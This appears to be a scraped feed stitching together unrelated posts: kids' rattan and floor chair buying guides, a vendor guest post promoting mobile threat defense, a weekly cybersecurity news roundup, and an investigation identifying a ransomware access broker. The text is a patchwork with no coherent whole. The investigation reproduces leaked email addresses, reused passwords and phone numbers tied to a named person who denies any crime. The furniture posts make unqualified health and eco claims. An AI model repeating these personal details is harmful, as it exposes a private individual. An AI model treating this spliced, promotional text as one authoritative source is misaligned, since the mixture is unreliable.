Yes, rattan furniture is eco-friendly. It is made from all-natural materials and does not contain any harmful chemicals. It does not require much energy to produce, allowing manufacturers to create a long-lasting product without harming the environment. The use of rattan furniture can reduce your carbon footprint by saving trees and reducing waste products.

Kids’ rattan chairs – our best picks

Furniture is an essential part of any home, and kids’ furniture is no exception. When it comes to finding the perfect chair for your child, you want something durable, eco-friendly, and stylish. Rattan chairs meet all of these requirements and make a great addition to any kid’s room.

The company called Beachy Mums caught our attention. It has a range of different rattan chairs for kids designed to be both stylish and comfortable. The chairs are made from all-natural materials, making them the perfect choice for kids prone to allergies or asthma.

Here are our top picks for rattan chairs for kids:

Beachy Mums Children’s Handmade Rattan Peacock Chair

This one is a beauty! The rattan material used to make this chair is sourced from Indonesia and crafted by hand. It’s lightweight and easy to move around, making it perfect for any room. It comes with a soft cushion for extra comfort. It is an excellent and stylish choice for kids aged 2-5.

Beachy Mums Rattan Toddler Rainbow Chair

If you’re looking for a rattan chair with a simpler design, this one is a great option. All-natural, sustainable materials are used to produce each one. These beautiful kids’ chairs are handcrafted in Java, Indonesia, and are of excellent quality.

The rainbow pattern makes it a great addition to any children’s space. This chair is ideal for children aged 2 years and older.

Beachy Mums Handmade Vintage Peace Sign Rattan Kid’s Chair

This vintage-style chair is perfect for younger kids. It features a cute peace sign design and is handmade from all-natural materials. The material used is eco-friendly and sustainable, so you know you’re doing the right thing by purchasing it. It is lightweight and easy to move around, making it perfect for any room. This chair is ideal for kids aged 2-5 years old.

Bloomingville Rattan Arm Chair

Time for a chair for both parent and child! This rattan armchair by Danish design company Bloomingville is perfect. It has a simple and stylish design that will complement any home décor. The all-natural rattan material makes it eco-friendly and sustainable. This rattan chair provides a basic yet beautiful bohemian design and a lighthearted atmosphere to the area. It is an excellent piece of Scandinavian design!

Where can I use my rattan furniture?

Rattan furniture is designed to be used on patios and backyards, but it also works inside the home. Rattan chairs add a touch of class to any room, especially if the chairs are used as part of a larger rattan furniture set. Rattan sofas and couches can be used in living rooms, dens, and bedrooms. The material’s natural properties make it easy to blend with any color scheme or theme. Rattan also matches well with wood or other types of furniture.

When should I replace my rattan furniture?

Rattan chairs are designed to last for years, but they can be damaged if left outside through harsh conditions such as rain and snow. To prevent your chair from getting damaged, cover it with a tarp or leave it inside when you’re not using it. If your chair does get damaged, you can usually repair it by using a rattan furniture repair kit.

How do I clean my rattan furniture?

Rattan furniture is easy to clean and does not require any special care. You can simply use a damp cloth to wipe away dirt and dust. If there is a spill, use a dry cloth to blot the liquid and then wipe with a wet cloth. Do not use any type of soap or cleaning agent, as this may damage the furniture. For more thorough cleaning, you can use a vacuum cleaner or soft-bristled brush to remove any dirt or dust that may be trapped in the fibers.

Are there any health risks associated with rattan furniture?

There are no known health risks associated with rattan furniture. The material is made from natural fibers and does not contain harmful chemicals or toxins. Rattan is also resistant to mold and mildew, making it a safe choice for people with allergies or asthma.

Conclusion

Rattan furniture is an excellent choice for any home. It has a simple and stylish design that will complement any décor. The all-natural rattan material is eco-friendly and sustainable, making it a responsible choice for your home. Rattan furniture is both durable and easy to maintain. Rattan chairs are designed for comfort, but the material also gives the room a lighthearted atmosphere.

The post Kids’ rattan chair – stylish and sustainable addition to your interior appeared first on Comfy Bummy.

Mobile Threat Defense | Bringing AI-Powered Endpoint Security To Your Mobile Devices

/0 Comments/in /by

A Guest Post by Shridhar Mittal, CEO of Zimperium

For the past few decades, corporations have spent considerable time and resources investing in security solutions for traditional endpoints and the infrastructure to which these devices connect. The focus has been on the devices their employees and customers use to connect to their services or workflows.

Modern workflows have evolved and grown, and as a result, new devices have been introduced into the enterprise environment. Many organizations big and small accepted these tablets and phones into their systems in the spirit of productivity, but have dedicated little thought as to how these devices might impact their attack surface.

The Rise of Mobile in the Enterprise

Over the last two years, the modern workforce has changed the face of enterprise security needs, pushing the envelope of technology, access, and capabilities for workers connecting into corporate systems all around the world. Far outside the scope of the physical corporate perimeters and the security within, these new workflows have done more than increase distributed efficiency; they have increased the modern enterprise attack surface to a scale many enterprises were not prepared to handle.

In the context of these last two years and the rapid transformation to work that they represented, mobile devices became utterly critical assets. From replacing the encrypted token keys of the past with two-factor authentication (2FA) apps, to enabling Microsoft Office 365 and other workforce productivity applications for mobile access, the phones and tablets adorning the desks of employees around the world were now part of the core enterprise technology ecosystem in a way they just had not been previously.

These devices are not all corporate-owned either. According to the Verizon Mobile Security Index 2021, 70% of organizations adopted BYOD policies to support the distributed worker. It must be stated explicitly: this means that enterprise data is being accessed, downloaded, and transferred to all of these devices, many of which are personally owned.

And this is not a flash in the pan. The reliance on the mobile endpoint is here to stay. According to the Verizon Mobile Security Index 2021, 71% of enterprises consider mobile to be very critical to business, a trend that rapidly accelerated due to the global pandemic. But with this heavy reliance comes a major shift in the total attack surface for each of these enterprises, and yet far too many still lack even the basic security afforded to more traditional endpoints.

Unprotected Mobiles Increase Your Attack Surface

With this sharp uptick in mobile reliance and usage, attackers have turned their focus to unsecured mobile devices, ripe with corporate system connections, personal and private data, and a low risk of being caught. Many recent headlines demonstrate these attacks are not just small data leaks. Instead, enterprises are faced with zero-day and zero-click vulnerabilities designed to target mobile devices to steal or spy on unsuspecting users. With the average user unaware of the risks to their devices, many of these attacks are more successful than even malicious actors anticipated.

According to Google’s Project Zero, so far in 2021 Android and iOS have accounted for 31% of all zero-day, in the wild vulnerabilities used in real attacks against real users (18 out of 58). This is a sharp uptick over 2020 where mobile-only accounted for 11% (3 out of 26).

Maddie Stone and Clement Lecigne of Google’s Threat Analysis Group attribute this sharp rise in attacks and the changing attack surface to the earlier mentioned reliance and aforementioned growth of mobile throughout the world.

“The growth of mobile platforms has resulted in an increase in the number of products that actors want capabilities for.” – Maddie Stone & Clement Lecigne, Google Threat Analysis Group, 2021

When you start thinking about enterprise data and security, the bottom line is mobile endpoints pose a great risk. From BYOD policies to Office 365, compliance mandates like HIPAA, PCI, or NERC, enterprises need to mandate security on all endpoints, including mobile just like traditional endpoints. There is no difference if an employee has data sitting on a laptop or a tablet; it’s one and the same.

From the rise of man-in-the-middle attacks targeting endpoints to misconfigured apps leaking critical information, it’s not just malware that is threatening mobile security. These relied-upon mobile endpoints and the data they are connected to through enterprise apps and services are left at risk due to vulnerable operating systems, malicious and poorly secured apps, and phishing. Rogue and compromised networks, an increasing number of apps with cross-functionality, and even mobile-malware complexity mirroring traditional threats continue to introduce risks to mobile endpoints and apps.

MDM Is No Substitute For Mobile Threat Defense

Over the last few years, many enterprises have turned to mobile device management (MDM) solutions to provide minimal aircover over their iOS and Android devices. When the threat was minimal, these solutions made sense as they could detect changes in the OS or delete corporate data in the event of a lost or stolen device.

But MDMs are not fit to fulfill the security needs of the modern enterprise, lacking the security controls, protections, and capabilities necessary to stand up against advanced threats. MDM solutions are the start of a cohesive mobile security strategy, but MDM cannot be relied upon as the only layer protecting enterprises from the growing mobile threat.

Protect Your Mobile Endpoints with MTD

The modern threat requires a modern security solution to stay ahead of the hacks and malware, minimizing the attack surface. Mobile threat defense (MTD) is enterprise security designed to stay ahead of the attackers, providing the visibility and confidence that IT and security teams need as more mobile endpoints connect into the corporate network.

The mobile endpoint’s security posture connected to corporate networks, both managed and unmanaged, needs to be addressed to avoid any of these devices becoming the starting point for a much larger security incident.

Properly configured and integrated, advanced MTD solutions can enhance existing zero-trust controls by providing mobile device risk attestation. This integration and extended security capabilities are vital to shoring up defenses for enterprises evolving from EPP to XDR security solutions. Advanced MTD solutions provide the features, workflow, and capability that complement XDR capabilities on mobile devices.

IT and security leaders responsible for their enterprise’s mobile endpoint security should be aware that purpose-built mobile security applications are designed to do more than prevent attacks and bring a whole host of other advanced security features to the mobile devices. While legacy mobile security tools do exist, they lack the advanced approach to mobile endpoint security necessary to keep up with modern-day threats.

“MTD products not only prevent attacks but also detect and remediate them. MTD focuses on identifying and thwarting malicious threats, rather than relying on device management configuration to protect against simple user mistakes.

[We] see no value in adopting antivirus solutions that do not provide behavioral anomaly prevention and detection, as the underlying mobile platforms already perform signature-based scans to look for malware.” – Gartner Market Guide for Mobile Threat Defense, March 2021

Integrating Mobile Threat Defense and XDR

With MTD and XDR coming together, organizations are taking a step into the future of complete endpoint security, addressing all the devices from the phone in the pocket to the desktop in the office with advanced security solutions. The alliance between Zimperium and SentinelOne addresses the complete endpoint attack surface, delivering critical security controls to security teams and protection to employees near and far.

By powering the brand new SentinelOne SingularityTM Mobile application added to the lineup, SentinelOne is now providing complete endpoint coverage and protection with the most advanced endpoint security solutions on the market, covering Android, ChromeOS, iOS, macOS, Linux, Windows and Windows Server operating systems, as well as IoT devices and Cloud workloads.

Conclusion

SentinelOne SingularityTM Mobile customers can now manage mobile device security alongside their user workstations, cloud workloads, and IoT devices. SingularityTM Mobile brings behavioral AI-driven protection, detection, and response directly to iOS, Android, and ChromeOS devices. Part of the Singularity Platform, SentinelOne delivers mobile threat defense that is local, adaptive, and real-time, to thwart mobile malware and phishing attacks at the device, with or without a cloud connection.

Singularity Mobile
Combat the Rising Tide of Threats

Learn More

About Zimperium

Zimperium, the global leader in mobile security, offers the only real-time, on-device, machine learning-based protection against Android, iOS, and Chromebook threats. Powered by z9, Zimperium provides protection against the device, network, phishing, and malicious app attacks.

Kids’ floor chair – a versatile sitting alternative that will leave you floored

/0 Comments/in /by

Children should be allowed to play and learn in a safe environment. The chairs should be healthy for children to use, and the furniture industry has looked into making chairs especially for kids. The first task was to create a comfortable chair for children of all sizes.

However, not every child likes to sit in a chair. Some of them don’t like it at all! These children would rather sit cross-legged on the floor or lay down and play on a carpet. This is where a new solution was needed.

The function of kids’ floor chair

The task was not easy, and it took a long time before the first children’s floor chairs were ready for sale. In the 70s, several different types of these chairs were designed and made in Denmark, Sweden, and Germany. They have been on sale since the early 1980s under different names.

Many companies have their versions of kids’ floor chairs in modern times, but the primary purpose is still the same – to offer a comfortable and safe place for children to sit and play. The chair can also be used as a place for children to take a nap or rest.

One of the great things about kids’ floor chairs is that they can be used anywhere. They are perfect for use in classrooms, daycares, and homes. They can also double as a temporary bed for little guests.

However, some parents are skeptical of the idea of floor chairs, claiming it’s not a healthy option for children to use because it does not help with posture. But is that the truth?

According to the pediatric physical therapist Jen O’Brien, “There are lots of benefits to using a floor chair rather than a traditional seated chair. First and foremost, it allows kids to move and stretch their bodies throughout the day, crucial for developing strong muscles and bones. Floor chairs also encourage kids to use their imaginations and creativity, as they can use the chairs for all sorts of activities – from reading and coloring to playing pretend games.”

The truth is that kids’ floor chairs are intended to be used temporarily. Children often move around or stand up while using the floor chairs, so it’s not likely for them to develop poor posture.

So, it would seem that the benefits of kids’ floor chairs outweigh any negatives. They are safe, comfortable and promote creativity and movement, all essential for healthy development. If you are looking for an alternative to traditional seating options for your child, a floor chair is a great option to consider.

What are the best kids’ floor chairs?

Parents are searching for the best kids’ furniture to make their children happy! As for choosing, there are many styles and brands of floor chairs on the market. However, our article will focus only on the best kids’ floor chairs that you can easily find online. The common thing is that they are safe, comfortable to sit on, durable, easy to use, and versatile!

Crestlive Products Floor Chair

This floor chair is available in two colors (blue and grey) and has five adjustable positions. This will help the child to use it for a more extended time. This floor chair features a flexible design that lets you lay the chair flat to sleep, lounge, watch your favorite movie, or play board games at 90°.

The Crestlive Products’ Floor Chair is designed with a breathable cotton fabric cover for a pleasant seat on any surface. The ergonomic design, which is highly resilient, adapts to your childs’ physique for a comfortable chair.

This floor chair is convenient too: it can be easily stored under a bed or tall couch. The floor chair cover is removable for washing. The unique reverse zipper on the cover prevents the floor from being scratched. Also, your child can store various items while reading or playing board games thanks to the back pocket.

Bonvivo Easy II Folding Floor Chair

This floor chair is perfect for children and adults who need a temporary seat. The Bonvivo Easy II Folding Floor Chair is ideal for use at home, office, or special events.

The chair can be folded for easy storage, perfect for small spaces. It is also lightweight, making it easy to transport. The chair is made of high-quality materials, making it durable and long-lasting. The fabric is also breathable, ensuring that the child remains comfortable while sitting.

The Bonvivo Easy II Folding Floor Chair is a perfect option for any parent or caretaker who wants to ensure that their child is happy and comfortable while seated.

OTTERLEAd Super Soft Floor Chair

OTTERLEAd Super Soft Floor Chair is comfy like no other – designed with high-density memory foam and soft plush fabric; thickened flannelette cushions will make you feel comfortable when sitting on the floor.

Both kids and adults will enjoy sitting on the floor with this comfy seat. It is perfect for reading, studying, watching TV and more!

The chair is portable and lightweight, making it easy to carry and move around everywhere. The OTTERLEAd Super Soft Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair.

FLOGUOR Foldable Floor Chair with Armrests and Pillow

The most expensive from the list and the most original of the bunch! The FLOGUOR Foldable Floor Chair with Armrests and Pillow is perfect for both kids and adults. The chair is made of high-quality materials, making it durable and long-lasting.

What’s so special about this floor chair is that it combines a soft pillowy design with the features of a traditional chair. It has an ergonomic design for comfort and support, which is perfect for kids. The chair features armrests for added relaxation, making it equally suitable for adults. FLOGUOR Foldable Floor Chair functions as 4 different products: a chair, a sofa, a recliner, and a bed.

Malu Luxury Padded Floor Chair with Back Support

The Luxury Padded Floor Chair by Malu is a super-comfortable foam-padded chair with an adjustable backrest that can be set to five distinct positions.

The Malu Chair is ideal for children and adults of all ages. It’s perfect for playing video games or even working from home! It’s a fantastic addition to your home, especially since it can serve as an extra seat or bed while having visitors.

Malu’s floor chair is also suitable to use outdoors. It is a great way to enjoy activities like sports events, relaxing or meditating in the park, camping, or just hanging out at the beach! The Malu floor chair even features an adjustable strap to make it convenient to transport.

The vegan leather on Malu Chair is perfect for blending in with any décor style. It’s effortless to keep clean and looks great with every aesthetic. Just remove the cover and wash it in the washing machine!

FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support

The FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support is a resilient chair designed for superior comfort. Constructed with high-quality materials, this floor chair guarantees a long life of perfect use!

With its ergonomic design and adjustable back support, the FLOGUOR Indoor 5-Position Adjustable Floor Chair is perfect for people of all ages. It is an excellent addition to playrooms, bedrooms, or even conference rooms!

The chair is also lightweight and portable, making it easy to move around. The FLOGUOR Indoor 5-Position Adjustable Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair at a reasonable price.

LAYBACK Floor Chair with Back Support

With a LAYBACK floor chair, you can just… lay back and enjoy! Relax and unwind as you watch, chat, play video games, or read a thrilling novel in this exquisite recliner.

This floor chair is adjustable and includes five reclining positions, so it’s suitable for a wide range of people and styles. You can sit just as you like it! The LAYBACK chair is made of high-quality materials, making it a durable and reliable choice for years to come. It is the floor chair option you don’t want to miss out on!

What is better for kids: sitting in a chair or on the floor?

There is no easy answer to this question, as it depends on the individual child. Some children feel more comfortable sitting in a chair, while others prefer to sit on the floor.

One of the benefits of using a floor chair is that it encourages kids to move around and stretch their bodies throughout the day. This is important for developing strong muscles and bones. Floor chairs also help kids use their imaginations and creativity, as they can use the chairs for all sorts of activities.

Another benefit of floor chairs is that they are often well-padded and comfortable. This makes them great for young children to use, as the padding helps to relieve pressure points when sitting down. It also reduces friction between the skin and fabric or wood material, leading to rashes.

In comparison, traditional chairs have been designed primarily for adults, so it’s no surprise that they are not always comfortable for children. They often do not have the proper padding, and they can be pretty stiff and uncomfortable.

Kids’ floor chairs are an excellent way for children to have a comfortable place to sit and play without having to use a regular chair. They offer a safe and healthy alternative for children who don’t like to sit in chairs, and they can be used for temporary seating and napping.

Besides being safe and comfortable, the chair needed to be durable and easy to use. It should also be possible to move them around on the floor or stack them up for storage.

However, in conclusion, it is up to the individual child to decide which option is better for them. Floor chairs offer several benefits over traditional chairs, including improved physical and mental development. But in the end, it is just a simple matter of personal preference.

The post Kids’ floor chair – a versatile sitting alternative that will leave you floored appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 49

/0 Comments/in /by

The Good

It’s been a great week for law enforcement. Just after we went to press last week, Interpol announced the arrest of over 1000 cyber criminals in an operation codenamed HAECHI-II (In Korea, Haechi is a popular mythical animal widely used as a symbol of justice).

Source

In raw arrests, that’s twice as successful as its predecessor, HAECHI-I earlier this year, which itself resulted in the arrest of 500 cyber fraudsters. The latest operation took place in twenty countries and intercepted $27m of illicit funds. Cyber cops also froze 2,350 bank accounts connected to various forms of online crime, including money laundering, investment fraud and romance scams.

Meanwhile, there have been welcome developments in a case we reported on back in October involving bulletproof hosting services aiding and abetting cybercrime. Prosecutors have now sentenced the third of four men indicted under RICO charges.

Aleksandr Grichishkin received a 5-year prison term for his role as a “founder and leader” of a gang that rented out IP addresses, servers and internet domains to spread malware such as Zeus, SpyEye, Citadel and the Blackhole Exploit Kit. Grichishkin’s sentence follows two- and four-year terms handed down to his co-conspirators. A fourth individual, Andrei Skvortsov, is yet to be sentenced. He faces a maximum penalty of 20 years.

The Bad

“Watch out for the quiet ones at the back” is a good adage in security in general, and when it comes to cybersecurity in particular, this means unnoticed devices like printers and IoT machines that can sit on our networks relatively forgotten in terms of endpoint protection.

This week, HP printers came to the forefront again as researchers disclosed details of flaws that could be used by attackers in remote as well as physical attacks. In one scenario, a user could be socially engineered to print out a malicious PDF containing an exploit for a font-parsing vulnerability. Just printing the document can give an attacker code execution rights, allowing data theft or lateral movement across the network.

Source

On top of that, one of the vulnerabilities found is wormable, meaning that compromising one printer on the network could lead to the compromise of any other connected devices that are vulnerable to the same bugs. Researchers say around 150 models of multi-function printers (MFPs) are affected. The flaws, tracked as CVE-2021-39237 and CVE-2021-39238, were patched last month by HP.

The disclosure follows SentinelLabs’ discovery in July of high severity flaws in HP, Samsung and Xerox printer drivers affecting millions of printers worldwide and which could allow unprivileged users to run code in kernel mode.

While exploitation of such attacks are by no means “low-hanging fruit”, the fact that network printers are often forgotten, unpatched and unprotected means they could present an attractive target for attackers. Ensuring you have visibility into everything connected to your network, particularly IoT devices like printers, is a must.

The Ugly

As the world continues to wrestle with the ongoing COVID-19 pandemic, threat actors have lost no time exploiting fears around the new Omicron variant in phishing lures.

This week’s egregious example involves an email scam purporting to come from the UK’s National Health Service offering recipients a free Omicron PCR test.

The email, which comes from a scam email address (contact-nhs@nhscontact.com), contains a “Get it now” button with a link to a fake NHS website. According to UK consumer watchdog Which?, the site directs users to enter personal details including full name, date of birth, address and phone number.

The email also contains plenty of the usual scare tactics to encourage people to click through to the malicious website. “What happens if you decline a COVID-19 Omicron test?”, the email asks, and goes on to state that “…we warned that testing is in the best interests of themselves, friends, and family. People who do not consent…must be isolated”.

The fake NHS website looks convincing and includes reassurances about “protecting the privacy” of personal information.

Source

The “free” offer turns out to require victims to pay £1.24 for delivery of the phony test. The small amount of the charge serves both to add authenticity and to disguise the scammers’ real intent: gathering the payment details of the victims for account takeover, fraud, and identity theft.

Anyone suspecting that they may have fallen victim to the scam are advised to contact their bank immediately, cancel any cards used in the transaction, and to change account passwords. The Which? consumer service also provides help on how to retrieve money lost in a scam.

Who Is the Network Access Broker ‘Babam’?

/0 Comments/in /by

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “operns@gmail.com.” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the operns@gmail.com address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says operns@gmail.com was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. The use of domains that begin with “www” is fairly common among phishers, and by passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, such as accidentally omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com  — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: devrian26@gmail.com. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address devrian27@gmail.com, and from an Internet address in Vilnius, Lithuania.

Devrian27@gmail.com was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for devrian27@gmail.com is bo3*******@gmail.com. Gmail accepts the address bo3domster@gmail.com as the recovery email for that devrian27 account.

According to Constella, the bo3domster@gmail.com address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456“.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including bo3dom@gmail.com.  Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the bo3dom@gmail.com used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address devrian25@gmail.com was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687“.

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautaus Mockus, using the phone number 86.7273687, and the email address bo3dom@gmail.com. The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the bo3dom@gmail.com address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillc in his forum comments and sales threads. Flashpoint said this could be an indication that a different person started using the Babam account since then, or more likely that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”